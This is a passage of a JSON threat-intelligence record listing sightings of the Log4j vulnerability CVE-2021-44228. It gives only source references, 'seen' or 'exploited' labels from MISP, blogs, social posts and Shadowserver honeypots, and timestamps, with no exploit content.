{"vulnerability": "CVE-2021-4422", "sightings": [{"uuid": "a5db1a21-84d4-4f25-9701-cd2c66b07831", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/dd6d8cc3-f12e-4050-ae9a-0b1e5f0069a5", "content": "", "creation_timestamp": "2021-12-29T12:38:21.000000Z"}, {"uuid": "4e89a93d-2655-4264-98a1-14f05e1e2947", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/e804ed63-36a3-438d-b753-08a9c5ca89d8", "content": "", "creation_timestamp": "2021-12-22T20:43:05.000000Z"}, {"uuid": "484c1026-a86b-47fa-a0f5-270f2aa2baf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/858ffb55-b5f6-41da-a9e0-f8f5a818e9ac", "content": "", "creation_timestamp": "2022-09-12T13:29:17.000000Z"}, {"uuid": "b5af0c7a-a29c-4308-a781-40fdf9f538e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/8bf50bb8-94dd-4004-a646-5f78db6f0b6a", "content": "", "creation_timestamp": "2022-07-13T13:02:16.000000Z"}, {"uuid": "fc655170-806b-4655-b215-900ff77c4f29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/b8bdfb52-f240-4c67-b1e4-cf8e0b0d435b", "content": "", "creation_timestamp": "2022-01-07T13:55:33.000000Z"}, {"uuid": "cd716051-4b01-45d3-a23a-9ca6c3de3810", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/31c446fb-8681-406a-a3dd-2fd6ba20c4d4", "content": "", "creation_timestamp": "2022-05-19T08:54:09.000000Z"}, {"uuid": "492da706-f839-4d00-8cd3-d632f7f3dc8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/af90366e-574e-47b3-964c-4c56fe745b5b", "content": "", "creation_timestamp": "2023-02-10T06:49:54.000000Z"}, {"uuid": "e023f25d-0f64-4b0a-b1a7-850065df2c73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/b4c819a4-f4df-4618-bb39-fa1d8365b7dd", "content": "", "creation_timestamp": "2024-07-27T23:04:40.000000Z"}, {"uuid": "a1a2cabc-e088-4e28-976a-1dc0c59d94ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "9bdb0f1b-bc4e-435b-8791-32c1c207c946", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/22f9f278-2341-4bf2-af91-b31198e4dc11", "content": "", "creation_timestamp": "2024-02-09T06:40:03.000000Z"}, {"uuid": "4585552c-fd2d-4ae1-83b2-132ce7390229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://msrc.microsoft.com/blog/2021/12/microsofts-response-to-cve-2021-44228-apache-log4j2/", "content": "", "creation_timestamp": "2021-12-12T07:00:00.000000Z"}, {"uuid": "da1dbe4a-d493-41bc-9d84-9e7968144b1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971181", "content": "", "creation_timestamp": "2024-12-24T20:25:28.863013Z"}, {"uuid": "942d8be9-b3de-4554-8180-eb2d76a7fa7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971808", "content": "", "creation_timestamp": "2024-12-24T20:34:18.961016Z"}, {"uuid": "b2b15d32-2df0-44fb-ae66-28de166eb698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://infosec.exchange/users/mttaggart/statuses/113710379966823182", "content": "", "creation_timestamp": "2024-12-24T23:25:04.884663Z"}, {"uuid": "93be020f-1858-410e-b609-37b08da86ceb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://infosec.exchange/users/catsalad/statuses/113770729753225996", "content": "", "creation_timestamp": "2025-01-04T15:14:33.967755Z"}, {"uuid": "fc2610d8-20d8-40a6-afe9-4facee54460e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://infosec.exchange/users/catsalad/statuses/113770817986627277", "content": "", "creation_timestamp": "2025-01-04T15:36:54.121363Z"}, {"uuid": "0f88b455-50aa-4b63-941c-c9c0ec5beb10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/lizthegrey.com/post/3lfo5jrgrfk2i", "content": "", "creation_timestamp": "2025-01-14T05:55:37.470149Z"}, {"uuid": "70db81fb-e600-497d-b668-573618d9b10f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-04)", "content": "", "creation_timestamp": "2025-02-04T00:00:00.000000Z"}, {"uuid": "81085c5a-461d-4533-9af3-def9c221a52c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-30)", "content": "", "creation_timestamp": "2025-01-30T00:00:00.000000Z"}, {"uuid": "e761a922-0a32-4ac5-a57f-8a1aea1be068", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "68c2cfee-e72d-41f4-8dea-464f04161e72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-29)", "content": "", "creation_timestamp": "2025-03-29T00:00:00.000000Z"}, {"uuid": "58d260b6-9dbc-4861-9862-509143b9dc12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-24)", "content": "", "creation_timestamp": "2025-01-24T00:00:00.000000Z"}, {"uuid": "d739ece6-2010-4109-a5b4-00ecc84084fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-27)", "content": "", "creation_timestamp": "2025-01-27T00:00:00.000000Z"}, {"uuid": "5b42e30c-ca9e-4251-bdef-de88f2759e65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-31)", "content": "", "creation_timestamp": "2025-01-31T00:00:00.000000Z"}, {"uuid": "982ddc15-4885-45c8-8404-6b81a6a823a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-23)", "content": "", "creation_timestamp": "2025-01-23T00:00:00.000000Z"}, {"uuid": "9ad43fe6-405f-4150-891f-7d335ba758df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-22)", "content": "", "creation_timestamp": "2025-01-22T00:00:00.000000Z"}, {"uuid": "a0aecbd3-7c0b-4ed9-acaa-93636f766304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-17)", "content": "", "creation_timestamp": "2025-01-17T00:00:00.000000Z"}, {"uuid": "95be2605-22f3-4bf7-82e6-e781520e432d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-18)", "content": "", "creation_timestamp": "2025-01-18T00:00:00.000000Z"}, {"uuid": "708d25bb-7a99-4696-bb85-e1afcd1ff307", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-15)", "content": "", "creation_timestamp": "2025-01-15T00:00:00.000000Z"}, {"uuid": "3d32a3eb-62b8-4302-90cc-e33541a931e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-27)", "content": "", "creation_timestamp": "2025-01-27T00:00:00.000000Z"}, {"uuid": "dd987f77-41bc-498f-95fd-2a08f2879cd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-19)", "content": "", "creation_timestamp": "2025-01-19T00:00:00.000000Z"}, {"uuid": "f2272182-10ef-4563-aaac-4b97c72988fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-21)", "content": "", "creation_timestamp": "2025-01-21T00:00:00.000000Z"}, {"uuid": "aed225df-52fd-4fd8-99c6-43e65959b988", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-23)", "content": "", "creation_timestamp": "2024-12-23T00:00:00.000000Z"}, {"uuid": "3d0af48a-b4de-4f09-ad69-3fdfa8b50041", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-24)", "content": "", "creation_timestamp": "2024-12-24T00:00:00.000000Z"}, {"uuid": "425375c5-5cb9-4dc5-b205-510173be6f16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-22)", "content": "", "creation_timestamp": "2024-12-22T00:00:00.000000Z"}, {"uuid": "4efdfa21-77b7-47de-b4be-664eeca49a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-20)", "content": "", "creation_timestamp": "2025-01-20T00:00:00.000000Z"}, {"uuid": "1113d108-8454-4797-96ed-6cfd7af0365c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-25)", "content": "", "creation_timestamp": "2024-12-25T00:00:00.000000Z"}, {"uuid": "b25ab3e5-d4fe-49cd-bb46-24f16ce79d55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-30)", "content": "", "creation_timestamp": "2024-12-30T00:00:00.000000Z"}, {"uuid": "13053544-9243-4900-b84c-a91e9fca4bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-27)", "content": "", "creation_timestamp": "2024-12-27T00:00:00.000000Z"}, {"uuid": "5fbab68b-7245-4ef2-932a-71444887b84b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-29)", "content": "", "creation_timestamp": "2024-12-29T00:00:00.000000Z"}, {"uuid": "df94e515-4319-4d09-aaad-5a5cda3e5e71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-05)", "content": "", "creation_timestamp": "2025-01-05T00:00:00.000000Z"}, {"uuid": "a0676cde-677e-4173-a09e-4fb533e0b7f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-02)", "content": "", "creation_timestamp": "2025-01-02T00:00:00.000000Z"}, {"uuid": "627f565f-3f97-4942-997b-1668b5ec85e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-31)", "content": "", "creation_timestamp": "2025-01-31T00:00:00.000000Z"}, {"uuid": "bac34bc8-7125-41b8-bec8-479f59dac60b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-01)", "content": "", "creation_timestamp": "2025-01-01T00:00:00.000000Z"}, {"uuid": "5ba3adbb-c62c-4347-b67e-2643ab40c0a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-06)", "content": "", "creation_timestamp": "2025-01-06T00:00:00.000000Z"}, {"uuid": "2aa22fcf-c1c1-46a7-acb5-028d56f53f92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-11)", "content": "", "creation_timestamp": "2025-01-11T00:00:00.000000Z"}, {"uuid": "ebedef33-9043-4088-b27a-e45a71dc9b06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-08)", "content": "", "creation_timestamp": "2025-01-08T00:00:00.000000Z"}, {"uuid": "e937e3de-98e3-4682-ac88-d0a8e1aacd48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-03)", "content": "", "creation_timestamp": "2025-01-03T00:00:00.000000Z"}, {"uuid": "91daa0e2-973d-4692-bb26-ffb7f65d4bc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-04)", "content": "", "creation_timestamp": "2025-01-04T00:00:00.000000Z"}, {"uuid": "4846e1f7-b373-4e0d-99ae-2d64710f7134", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-07)", "content": "", "creation_timestamp": "2025-01-07T00:00:00.000000Z"}, {"uuid": "44afb9a1-eaab-490b-af75-0cce782d4209", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-10)", "content": "", "creation_timestamp": "2025-01-10T00:00:00.000000Z"}, {"uuid": "e75a6a8c-45b0-4419-b158-bc1e56183b2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-09)", "content": "", "creation_timestamp": "2025-01-09T00:00:00.000000Z"}, {"uuid": "d59f496e-9dc5-4f36-bbf2-6f00fc69ba76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-02)", "content": "", "creation_timestamp": "2025-02-02T00:00:00.000000Z"}, {"uuid": "b0aded97-5102-4f5b-8b0d-d704483c3014", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-12)", "content": "", "creation_timestamp": "2025-01-12T00:00:00.000000Z"}, {"uuid": "b2dd2704-c03d-4fdb-858e-1e96366b280a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-13)", "content": "", "creation_timestamp": "2025-01-13T00:00:00.000000Z"}, {"uuid": "95d6db7d-b64d-4daa-b1fb-5dc1a03d9481", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-24)", "content": "", "creation_timestamp": "2024-10-24T00:00:00.000000Z"}, {"uuid": "1273c330-cb72-4644-a170-9ea50f2dd280", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-27)", "content": "", "creation_timestamp": "2024-10-27T00:00:00.000000Z"}, {"uuid": "aba7f069-d240-48c2-a813-2b828e34ab05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-25)", "content": "", "creation_timestamp": "2024-10-25T00:00:00.000000Z"}, {"uuid": "e7fe0a50-e00f-4f00-9e57-2b3c21a3e365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-26)", "content": "", "creation_timestamp": "2024-10-26T00:00:00.000000Z"}, {"uuid": "d0c0697a-412d-4bd7-b9fd-89e4964fc9c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-29)", "content": "", "creation_timestamp": "2024-10-29T00:00:00.000000Z"}, {"uuid": "2053f6ee-7a7d-4666-add6-5dc5c059a9be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-28)", "content": "", "creation_timestamp": "2024-10-28T00:00:00.000000Z"}, {"uuid": "1fff02b3-17c9-4e02-ad0c-4c2e56f60801", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-30)", "content": "", "creation_timestamp": "2024-10-30T00:00:00.000000Z"}, {"uuid": "e62f2bab-c354-4db5-9229-93a20b7eedf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-01)", "content": "", "creation_timestamp": "2024-11-01T00:00:00.000000Z"}, {"uuid": "e8b82005-7d42-4bbf-8b8c-9309cc1d6f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "05458b5a-ff82-4c7c-a1f9-ca63809548dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-07)", "content": "", "creation_timestamp": "2024-11-07T00:00:00.000000Z"}, {"uuid": "50aa06ca-bfa0-4518-b1ac-cf9d58d32b4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-05)", "content": "", "creation_timestamp": "2024-11-05T00:00:00.000000Z"}, {"uuid": "46b6b7c3-bb9c-4493-9b80-a55fac5d2411", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-03)", "content": "", "creation_timestamp": "2024-11-03T00:00:00.000000Z"}, {"uuid": "38eef891-ec9d-48c5-bf9f-b786b5bb0498", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-09)", "content": "", "creation_timestamp": "2024-11-09T00:00:00.000000Z"}, {"uuid": "cfa5f2bd-bc36-440b-a7b7-03bcf8957915", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-10)", "content": "", "creation_timestamp": "2024-11-10T00:00:00.000000Z"}, {"uuid": "8d81a41e-d061-41be-878d-01b9bfbaabd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-11)", "content": "", "creation_timestamp": "2024-11-11T00:00:00.000000Z"}, {"uuid": "9076728f-2842-49f2-85aa-0f23f15215ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-04)", "content": "", "creation_timestamp": "2024-11-04T00:00:00.000000Z"}, {"uuid": "e0eb8a93-ad2e-4863-8de3-149d51e4e62b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-06)", "content": "", "creation_timestamp": "2024-11-06T00:00:00.000000Z"}, {"uuid": "5fc3dc2c-5d28-48d8-9760-cfa84d0607e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "59f5f0d6-97e4-4ffb-a2c1-75b276a8df62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver 